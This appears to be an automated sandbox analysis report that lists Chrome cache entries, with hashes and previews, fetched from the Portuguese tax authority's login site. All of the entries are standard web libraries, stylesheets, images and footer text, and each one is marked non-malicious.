                                                                                                                SSDEEP:768:IWb2inOxtoJ6VpwRl13/+4gw0SnG/0S8f0S8wkGfktk/mhE+:Bb22OxOJ6Vpw/13m4gSmhE+
                                                                                                                MD5:7CEF22B9E1BF64EC9597396229900B3A
                                                                                                                SHA1:8E9024B218DCAE87E5451663753BC8607110A2C0
                                                                                                                SHA-256:9206C9C869B248A0BC222DB370113845B0D7BEC0FB0C7CE7AF957D9D2AB2E28D
                                                                                                                SHA-512:D9AEDD640CFDFA3E50425C781FB6C05484DDFCDFCE5946AB07C2C489C59C4E37EC7B93DF79F75FF6084742BA64A46494A210F80D8ABCE071DBB1C1F914F504A5
                                                                                                                Malicious:false
                                                                                                                Preview:(function ($) {.. if (!window.SA) {.. SA = {};.. }.... //*.. //* Generic Modal Function (Open and Close).. //*.... SA.Modal = function () {.. return {.. Open: function (id, callback) {.. id.fadeIn(600);.. $('html, body').stop().animate({ scrollTop: id.css('margin-top') }, 600);.... if(callback) {.. callback();.. }.. },.. Close: function (id, callback) {.. id.fadeOut(600);.... if(callback) {.. callback();.. }.. }.. };.. }();.... //*.. //* Form: Novo Utilizador.. //*.... SA.newUserForm = function () {.. var theForm = $('#newUserForm'),.. submitBtn = theForm.find('input[type=submit]'),.. notifications = theForm.find('#notifications'),.. inputEmail = theForm.find('input[type=email]'),.. checkboxEmail =

                                                                                                                Chrome Cache Entry: 107

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 429 x 727, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:dropped
                                                                                                                Size (bytes):43457
                                                                                                                Entropy (8bit):7.9638651297217935
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:tSWaGYgbYWSuQyZk/wmBfRih+EcQ0DccVdbNWPi8J5W2jLBEKpPL6zt334:t1bYg3gyZ8TOD5cLN58J42jLOKpza4
                                                                                                                MD5:841D0BC9367FBB99D878411AAFF20275
                                                                                                                SHA1:99D2C1BB03118760FDBEED83044AB49015252DD3
                                                                                                                SHA-256:D09142E539ED99866028C1E364414A3AE60B2CB6D0DA260D5C45EAF7959D9EB5
                                                                                                                SHA-512:EA917F73A202E02B67AE4F31E83728DEE29F03D63F4753B8F1741EA9E7562A09EAFA2A47F3D5152B78B884820C43854B693CB8E408086170BA8B014F4CC4163C
                                                                                                                Malicious:false
                                                                                                                Preview:.PNG........IHDR.............>.......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:a4af9685-df3c-4b64-81aa-4e7cae4e7227" xmpMM:DocumentID="xmp.did:8E4FF9D58DF311E4B2B8C0A529914AA5" xmpMM:InstanceID="xmp.iid:8E4FF9D48DF311E4B2B8C0A529914AA5" xmp:CreatorTool="Adobe Photoshop CC 2014 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:d2409a93-3826-4bac-a0fc-945b22676568" stRef:documentID="adobe:docid:photoshop:95e515eb-ba9e-1177-b6de-bfe0123df8d4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C....IDATx....]U

                                                                                                                Chrome Cache Entry: 108

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with very long lines (65367), with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):117154
                                                                                                                Entropy (8bit):5.102547231047266
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:1yzGxw4vyBQWlJxtQOIRFHlgmyITm8qAlSFKbv2ctBDIq50Qfu8psYvS1Fz:lw4aL9IRFHlgmK8pPb5qQfpC
                                                                                                                MD5:C3D736F4400B9451E591FF09606D7AF0
                                                                                                                SHA1:D2333A926AE25BBD3056814F13FEC0843468E49E
                                                                                                                SHA-256:C8451F97C65F01678D0137AFA161C420303896E68DD27460B385712E1CC82DB1
                                                                                                                SHA-512:D353430DCE90BDB12ED18A44D84F4C78770146783F9D13FE3E3ED16F5731BEEB3B6FCF29F94CE7C8AD32F047EC3CB291A6AD28AABFB0B37255C57671EFDB7B28
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/css/bootstrap.min.css?cb=5.2.10
                                                                                                                Preview:/*!.. * Bootstrap v3.3.2 (http://getbootstrap.com).. * Copyright 2011-2015 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. *//*! normalize.css v3.0.2 | MIT License | git.io/normalize */html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{margin:.67em 0;font-size:2em}mark{color:#000;background:#ff0}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{height:0;-w

                                                                                                                Chrome Cache Entry: 109

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6518
                                                                                                                Entropy (8bit):2.6111970432860367
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:GjtIzfm79zXQbHCWfyADAolvx8qZybjc1:3Qzgb7y4TJtyP
                                                                                                                MD5:8102D44D0C555D9EA5F0F6E03131734B
                                                                                                                SHA1:108E7CFBE30E36C0FE73DE0591D541371225DC51
                                                                                                                SHA-256:B2CBEBB8F1479868C4FC79E20C8937D94859D45C3445E3C6ECC0841BEC20C67B
                                                                                                                SHA-512:9CDDCF5411D298395551A52168AAD14B3365F3E46CBD3EAA068D07D24E482CA0D73D561D6EDB59EA93C5220533DCF6C329ED92568AFC36BA9C47E651CD585610
                                                                                                                Malicious:false
                                                                                                                Preview:............ .(...&... .... .(...N...(....... ..... ..............................................................................................................yi.........................................................S....ra.sU@.wZF.........P*..N(..................................D...D...D...F............ve.D..................................D....o].lL6.V1...q`.........sU@................................D..........D...D.........r.S...................................D.....{.sU@.K$..D....q_..o].D................................~.E........q.......y.`>&...........v..........................xg.J#..................eD-....................................m[.D....ve.nO9.S/..K$...xg..yi.D...............................rT?.K%..........D...D.....v...................................[8 .D.....w.uXC.D...D...W3.....................................iI3.O)..Z7..H ..D...[8 ......m[......................................ud......ud...~.................................................ud......w

                                                                                                                Chrome Cache Entry: 110

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:HTML document, ASCII text, with very long lines (1475)
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1525
                                                                                                                Entropy (8bit):4.898762569340083
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:DcsWRcieA/Fhxwkw4lPJju6m4ITcbz3LRQfFevzADIctm16A6mNmMg+GX7RRHfA:DydTat4lPJy0ITcP9AevUt9A6S9gd8
                                                                                                                MD5:74EF677768ABAA390ECD61C5E55F7D32
                                                                                                                SHA1:1362473BA9A3B0E993737D67862586FF7F611B6A
                                                                                                                SHA-256:FCC6F846F1230079B8049C30BAC80ABD2E9B2D68E8F90E985A33008F2574C294
                                                                                                                SHA-512:53F9ABE1BD59163142F5598A68AD0E1A821BF274DF122760731A16D7CBDA8DBC2C467D68D1981AFBFCA50A12A94CEBD636072DDF0C19AFEC5B8858B481B54D56
                                                                                                                Malicious:false
                                                                                                                Preview:window.PF||(PF={}),window.PF.common||(PF.common={footer:'<b>Dados Pessoais</b><br />A Autoridade Tribut&aacute;ria e Aduaneira (AT) trata dados pessoais no &acirc;mbito das suas atribui&ccedil;&otilde;es, designadamente as constantes do artigo 2.&ordm;, n.&ordm; 2, do Decreto-Lei n.&ordm; 118/2011, de 5 de dezembro. Para cumprimento do Regulamento Geral sobre a Prote&ccedil;&atilde;o de Dados (RGPD) e da Lei n.&ordm; 58/2019, de 8 de agosto, o Despacho n.&ordm; 13949-A/2022 designou a mestre In&ecirc;s Oliveira Andrade de Jesus como <a href="@info-url@/pt/at/Pages/Encarregado_protecao_dados.aspx" title="encarregada da prote&ccedil;&atilde;o de dados">encarregada da prote&ccedil;&atilde;o de dados</a> da AT. Os titulares dos dados podem contactar a encarregada da prote&ccedil;&atilde;o de dados da AT sobre todas as quest&otilde;es relacionadas com o tratamento dos seus dados pessoais e com o exerc&iacute;cio dos direitos que lhe s&atilde;o conferidos pelo RGPD atrav&eacute;s do endere&c

                                                                                                                Chrome Cache Entry: 111

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):852
                                                                                                                Entropy (8bit):4.424544189875972
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:2b6gQHF5qKbs75WwYciwXSfTug6RnA5fQEHTmNRdjBxSiHFxrsRxM:2OgQdsFQhw4yXRA5BkjfHPAa
                                                                                                                MD5:593751414148EB74201C2D209A609E4A
                                                                                                                SHA1:7DA3CEBC757A98E2C3CFF4EA9BF85FDD646A9923
                                                                                                                SHA-256:B2BD6402F209266B7E64C146C77388E67C12E3A6D8B81D18076E6801608DAE6C
                                                                                                                SHA-512:03F306CB5F7C9BF614C1DCFFB6850029886A9EF44F36F6D454B5848AE9D830B6EA8A39EE7DFC6F68E57C254BA66C025D9374A885846997158BC7B29CC8B42C94
                                                                                                                Malicious:false
                                                                                                                Preview:(function($,sr){.... // debouncing function from John Hann.. // http://unscriptable.com/index.php/2009/03/20/debouncing-javascript-methods/.. var debounce = function (func, threshold, execAsap) {.. var timeout;.... return function debounced () {.. var obj = this, args = arguments;.. function delayed () {.. if (!execAsap).. func.apply(obj, args);.. timeout = null;.. };.... if (timeout).. clearTimeout(timeout);.. else if (execAsap).. func.apply(obj, args);.... timeout = setTimeout(delayed, threshold || 100);.. };.. }.. // smartresize.. jQuery.fn[sr] = function(fn){ return fn ? this.bind('resize', debounce(fn)) : this.trigger(sr); };....})(jQuery,'smartresize');

                                                                                                                Chrome Cache Entry: 75

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1303), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):3496
                                                                                                                Entropy (8bit):4.9627602211027035
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:4WNFT6rFZdTat4lPJ90ITcP9AevUt9A6S9IAArqGnjdlzS9hakP1GzJ1tJwlgODJ:56rc4x9lDmYqAzm8Il5D5eFk
                                                                                                                MD5:1502FECE40BD14167173803D98F8281B
                                                                                                                SHA1:2B3F37EF634960A4E95C06A6A5F9F12932D0F586
                                                                                                                SHA-256:FE1B489D668E0538B6A0CAA3D2FDC372E7C32D70C036188E3910A016B75DE21F
                                                                                                                SHA-512:23C8FE828F2C78F1FDEEA7AC6EFFDA00F749757573001FA1235D953BD31E9D545451C28C4D5BD9FE05DD4D2E4F0C2695BD57EADB55C99AE7A100B8A3B6900621
                                                                                                                Malicious:false
                                                                                                                Preview:window.onload = function() {.... /**.. * Preencher footer com a info do RGPD.. */.... var footerElem = document.getElementById("footer-rgpd-content");.... if (window.PF && window.PF.common && window.PF.common.footer) {.... footerElem.innerHTML = PF.common.footer;.... } else {.... footerElem.innerHTML = '<b>Dados Pessoais</b><br />A Autoridade Tribut&aacute;ria e Aduaneira (AT) trata dados pessoais no &acirc;mbito das suas atribui&ccedil;&otilde;es, designadamente as constantes do artigo 2.&ordm;, n.&ordm; 2, do Decreto-Lei n.&ordm; 118/2011, de 5 de dezembro. Para cumprimento do Regulamento Geral sobre a Prote&ccedil;&atilde;o de Dados (RGPD) e da Lei n.&ordm; 58/2019, de 8 de agosto, o Despacho n.. 13949-A/2022 designou a mestre In&ecirc;s Oliveira Andrade de Jesus como <a href="@info-url@/pt/at/Pages/Encarregado_protecao_dados.aspx" title="encarregada da prote&ccedil;&atilde;o de dados">encarregada da prote&ccedil;&atilde;o de dados</a> da AT. Os ti

                                                                                                                Chrome Cache Entry: 76

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with very long lines (32025), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):35961
                                                                                                                Entropy (8bit):5.18176511611712
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:K8lBD27UwlNBMl9/qahC2+jS1g8ep0skCXFXflcLGf3Z1RQ:Be78+S1Klvl13ZrQ
                                                                                                                MD5:D553B8F8CFF983D211D68FC7E9445121
                                                                                                                SHA1:DDD0F156ABA8E3C5F2BF865D81DB38052280D3DE
                                                                                                                SHA-256:47DFF31AB3E6C7ACB2D21E50F930D13816188F208BB62486E32F33A31CC21D9B
                                                                                                                SHA-512:16EC46A4C87090B3D6F8A60B35AE919050DEA0F6104E1F8A2C6B61E715C0E90900C33EF60569F1EB6195DA104938E519CE4F024637FECD521A208B86835C4454
                                                                                                                Malicious:false
                                                                                                                Preview:/*!.. * Bootstrap v3.3.4 (http://getbootstrap.com).. * Copyright 2011-2015 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */..if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transi

                                                                                                                Chrome Cache Entry: 77

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:assembler source, ASCII text, with very long lines (540), with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):217455
                                                                                                                Entropy (8bit):4.965877834386948
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:STm0bed4vm25c3S2Qle55+sI+PICshVeRvdVDlCWn7L:gvm25c3S2QleFlD
                                                                                                                MD5:A78C1B5A7B0E848E2D35585AA15C87F0
                                                                                                                SHA1:99901C325151BF3298B5FFD30340BF84BB040659
                                                                                                                SHA-256:14866C56B2B92C62667A2E90A578F7B3E2183001B551E800652D7CC363B15992
                                                                                                                SHA-512:EE8A232314D50A57EE036429B173FADC9C712107FBEF0AB0CCD49128B1637F63767D0650200E758ECC677D0A01B3E3AC3369BB57088FAED894D3D1902892937D
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/pf/css/pf-main.css?cb=5.2.10
                                                                                                                Preview:@charset "UTF-8";...font-smooth {.. -webkit-font-smoothing: antialiased;..}...optimizeLegibility {.. text-rendering: optimizeLegibility;..}...hiddenOnOff {.. display: none;..}...hide-text {.. font: 0/0 serif;.. text-shadow: none;.. color: transparent;..}...text-overflow {.. overflow: hidden;.. text-overflow: ellipsis;.. white-space: nowrap;..}...menu-main-list a {.. font-weight: bold;.. color: #0084cc;..}../*! normalize.css v3.0.2 | MIT License | git.io/normalize */..html {.. font-family: sans-serif;.. -ms-text-size-adjust: 100%;.. -webkit-text-size-adjust: 100%;..}..body {.. margin: 0;..}..article,..aside,..details,..figcaption,..figure,..footer,..header,..hgroup,..main,..menu,..nav,..section,..summary {.. display: block;..}..audio,..canvas,..progress,..video {.. display: inline-block;.. vertical-align: baseline;..}..audio:not([controls]) {.. display: none;.. height: 0;..}..[hidden],..template {.. display: none;..}..a {..

                                                                                                                Chrome Cache Entry: 78

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 212 x 65, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:dropped
                                                                                                                Size (bytes):8698
                                                                                                                Entropy (8bit):7.972129156306832
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:ojhCKmMRBXYAd45wOwagxDag9N9U4jytCx13xarqtspgLJEq7T3:MCLMHXEIDagn9U4jrT8Oys
                                                                                                                MD5:743EF9C73729BA67476CA30566FC0D26
                                                                                                                SHA1:6B56E95B4BDE6F2B5A5B7408FD15C0BA36FF6527
                                                                                                                SHA-256:4B49BD0B9A19851F0941CAB4389766487335F98B8C250451455CDB81DBE0AC4C
                                                                                                                SHA-512:5AA2B9A8F64D893FFAE8668839BB2178060BD02BF78BEDEE6293BF3BE61415F02128D124D3FB1049F85FDE0F166F7AACB5B471AAF75E02D0B5411CE50D975679
                                                                                                                Malicious:false
                                                                                                                Preview:.PNG........IHDR.......A......u......sBIT....|.d.....pHYs.........B(.x....tEXtSoftware.www.inkscape.org..<... .IDATx..w|Te....L......M.*.XP.H&.(...Z...{Cw.]\...v.E....R.."R,.".d&HQBO......d.I(.....Lr.}....>.9.9..U...........?.a(...!..r....}.....n\.#;...I...... ..7...'.@...<...G.#@.cG~...'u.......8.P..Z.....R..~.8...*L.&....(.A..ek.=.;...'......^6Q._....:p.{@..*.....u...:B.^%.e.x.....}w..u.(g......:.....2B.p...D......}...X.1....~u9p..G...a...\:.s..kn.s...~:.d..].t....~......|.Mi}.x..H.[...o....tC.Z.Y.G.c..y.q...8..KG....0..............*...e.......o..d.U.?/.`)p.t...../.....82....}L......m......3.....8.5.e(I.cp.2.r.9M#.KJ..._.....sf.:c...G....1.....HJL..?.nw|.n..;.}....4.A.O.0gi=.....!..$...5.h g~......... ..b.Y.(.7.}C..o.O....r.rkCLyd_.......(--..../-+..g'..G.xn.....Z.He...v....5w?]I.f.8h.....0...........K.c .V..................*.!..]..?$(]3......~r"...V$.9...t..J..>.q..+nw']7m=.H...{.P.T`}T..o.....r.....<.69..BT.g+.....>..G...q)....9%.`

                                                                                                                Chrome Cache Entry: 79

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 212 x 65, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):8698
                                                                                                                Entropy (8bit):7.972129156306832
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:ojhCKmMRBXYAd45wOwagxDag9N9U4jytCx13xarqtspgLJEq7T3:MCLMHXEIDagn9U4jrT8Oys
                                                                                                                MD5:743EF9C73729BA67476CA30566FC0D26
                                                                                                                SHA1:6B56E95B4BDE6F2B5A5B7408FD15C0BA36FF6527
                                                                                                                SHA-256:4B49BD0B9A19851F0941CAB4389766487335F98B8C250451455CDB81DBE0AC4C
                                                                                                                SHA-512:5AA2B9A8F64D893FFAE8668839BB2178060BD02BF78BEDEE6293BF3BE61415F02128D124D3FB1049F85FDE0F166F7AACB5B471AAF75E02D0B5411CE50D975679
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/img/logo-at.png
                                                                                                                Preview:.PNG........IHDR.......A......u......sBIT....|.d.....pHYs.........B(.x....tEXtSoftware.www.inkscape.org..<... .IDATx..w|Te....L......M.*.XP.H&.(...Z...{Cw.]\...v.E....R.."R,.".d&HQBO......d.I(.....Lr.}....>.9.9..U...........?.a(...!..r....}.....n\.#;...I...... ..7...'.@...<...G.#@.cG~...'u.......8.P..Z.....R..~.8...*L.&....(.A..ek.=.;...'......^6Q._....:p.{@..*.....u...:B.^%.e.x.....}w..u.(g......:.....2B.p...D......}...X.1....~u9p..G...a...\:.s..kn.s...~:.d..].t....~......|.Mi}.x..H.[...o....tC.Z.Y.G.c..y.q...8..KG....0..............*...e.......o..d.U.?/.`)p.t...../.....82....}L......m......3.....8.5.e(I.cp.2.r.9M#.KJ..._.....sf.:c...G....1.....HJL..?.nw|.n..;.}....4.A.O.0gi=.....!..$...5.h g~......... ..b.Y.(.7.}C..o.O....r.rkCLyd_.......(--..../-+..g'..G.xn.....Z.He...v....5w?]I.f.8h.....0...........K.c .V..................*.!..]..?$(]3......~r"...V$.9...t..J..>.q..+nw']7m=.H...{.P.T`}T..o.....r.....<.69..BT.g+.....>..G...q)....9%.`

                                                                                                                Chrome Cache Entry: 80

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with very long lines (32086), with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):95790
                                                                                                                Entropy (8bit):5.394132126458497
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:EPEkjP+iADIOr/NEe876nmBu3HvF38sEeL8FoqqhJ7SerN5wVI+xcBpPv7E+nzmN:bNMzqhJvN32cBd7M6Whca98Hr4
                                                                                                                MD5:4DC834D16A0D219D5C2B8A5B814569E4
                                                                                                                SHA1:4FBE0563917D6F6289E4E1B4A0A8758E4E43BDA9
                                                                                                                SHA-256:91222F96F34735EBC88DF208017E54D4329B9202E3E52367FB8B149698A1A5EF
                                                                                                                SHA-512:6FBEC4785A21520FA623D1A151C6C8B64BAA1321AC6918A127BCFC22E49EC2E3BCD161AF9C237BD5C70BC4046EB12CF434563F86CBDC9876EB67FB2DEA87034B
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/js/jquery/jquery-1.11.1.min.js?cb=5.2.10
                                                                                                                Preview:/*! jQuery v1.11.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.1",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){re

                                                                                                                Chrome Cache Entry: 81

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:HTML document, ASCII text, with very long lines (5238), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):5418
                                                                                                                Entropy (8bit):5.295213776015613
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:t4A8XX1wZG2DcHcmlG8Q48tZGruP0XTepmNWb14ANxYPeqdqPqyPC0m2lY:tUwZG2g8myTtZ6lKQob1dHYPeIny6xX
                                                                                                                MD5:D704F7C9C62C47B265F2C5700A45743E
                                                                                                                SHA1:F652122ED0AAA37EDC4707975B45AE3641EC6D10
                                                                                                                SHA-256:20C35EBC2DAEB43DA1383ED5C762C2EDDFCF762B389883924397F75BB6442D7B
                                                                                                                SHA-512:E469B5C61A8CB94A31DF124F3159855434A4E0AEE386E20A5E82BBE1D23A353B58F29EB317BFB15DB8ED879BAECE851AC92F2DA1857D019D7C104BA0D813E6D2
                                                                                                                Malicious:false
                                                                                                                Preview:/* Modernizr 2.8.3 (Custom Build) | MIT & BSD.. * Build: http://modernizr.com/download/#-shiv-addtest-prefixed-teststyles-testprop-testallprops-hasevent-prefixes-domprefixes.. */..;window.Modernizr=function(a,b,c){function z(a){i.cssText=a}function A(a,b){return z(l.join(a+";")+(b||""))}function B(a,b){return typeof a===b}function C(a,b){return!!~(""+a).indexOf(b)}function D(a,b){for(var d in a){var e=a[d];if(!C(e,"-")&&i[e]!==c)return b=="pfx"?e:!0}return!1}function E(a,b,d){for(var e in a){var f=b[a[e]];if(f!==c)return d===!1?a[e]:B(f,"function")?f.bind(d||b):f}return!1}function F(a,b,c){var d=a.charAt(0).toUpperCase()+a.slice(1),e=(a+" "+n.join(d+" ")+d).split(" ");return B(b,"string")||B(b,"undefined")?D(e,b):(e=(a+" "+o.join(d+" ")+d).split(" "),E(e,b,c))}var d="2.8.3",e={},f=b.documentElement,g="modernizr",h=b.createElement(g),i=h.style,j,k={}.toString,l=" -webkit- -moz- -o- -ms- ".split(" "),m="Webkit Moz O ms",n=m.split(" "),o=m.toLowerCase().split(" "),p={},q={},r={},s=[],t=s.

                                                                                                                Chrome Cache Entry: 82

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):852
                                                                                                                Entropy (8bit):4.424544189875972
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:2b6gQHF5qKbs75WwYciwXSfTug6RnA5fQEHTmNRdjBxSiHFxrsRxM:2OgQdsFQhw4yXRA5BkjfHPAa
                                                                                                                MD5:593751414148EB74201C2D209A609E4A
                                                                                                                SHA1:7DA3CEBC757A98E2C3CFF4EA9BF85FDD646A9923
                                                                                                                SHA-256:B2BD6402F209266B7E64C146C77388E67C12E3A6D8B81D18076E6801608DAE6C
                                                                                                                SHA-512:03F306CB5F7C9BF614C1DCFFB6850029886A9EF44F36F6D454B5848AE9D830B6EA8A39EE7DFC6F68E57C254BA66C025D9374A885846997158BC7B29CC8B42C94
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/js/smartresize.js?cb=5.2.10
                                                                                                                Preview:(function($,sr){.... // debouncing function from John Hann.. // http://unscriptable.com/index.php/2009/03/20/debouncing-javascript-methods/.. var debounce = function (func, threshold, execAsap) {.. var timeout;.... return function debounced () {.. var obj = this, args = arguments;.. function delayed () {.. if (!execAsap).. func.apply(obj, args);.. timeout = null;.. };.... if (timeout).. clearTimeout(timeout);.. else if (execAsap).. func.apply(obj, args);.... timeout = setTimeout(delayed, threshold || 100);.. };.. }.. // smartresize.. jQuery.fn[sr] = function(fn){ return fn ? this.bind('resize', debounce(fn)) : this.trigger(sr); };....})(jQuery,'smartresize');

                                                                                                                Chrome Cache Entry: 83

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with very long lines (32025), with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):35961
                                                                                                                Entropy (8bit):5.18176511611712
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:K8lBD27UwlNBMl9/qahC2+jS1g8ep0skCXFXflcLGf3Z1RQ:Be78+S1Klvl13ZrQ
                                                                                                                MD5:D553B8F8CFF983D211D68FC7E9445121
                                                                                                                SHA1:DDD0F156ABA8E3C5F2BF865D81DB38052280D3DE
                                                                                                                SHA-256:47DFF31AB3E6C7ACB2D21E50F930D13816188F208BB62486E32F33A31CC21D9B
                                                                                                                SHA-512:16EC46A4C87090B3D6F8A60B35AE919050DEA0F6104E1F8A2C6B61E715C0E90900C33EF60569F1EB6195DA104938E519CE4F024637FECD521A208B86835C4454
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/js/bootstrap/bootstrap-3.3.4.min.js?cb=5.2.10
                                                                                                                Preview:/*!.. * Bootstrap v3.3.4 (http://getbootstrap.com).. * Copyright 2011-2015 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */..if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transi

                                                                                                                Chrome Cache Entry: 84

                                                                                                                Download File
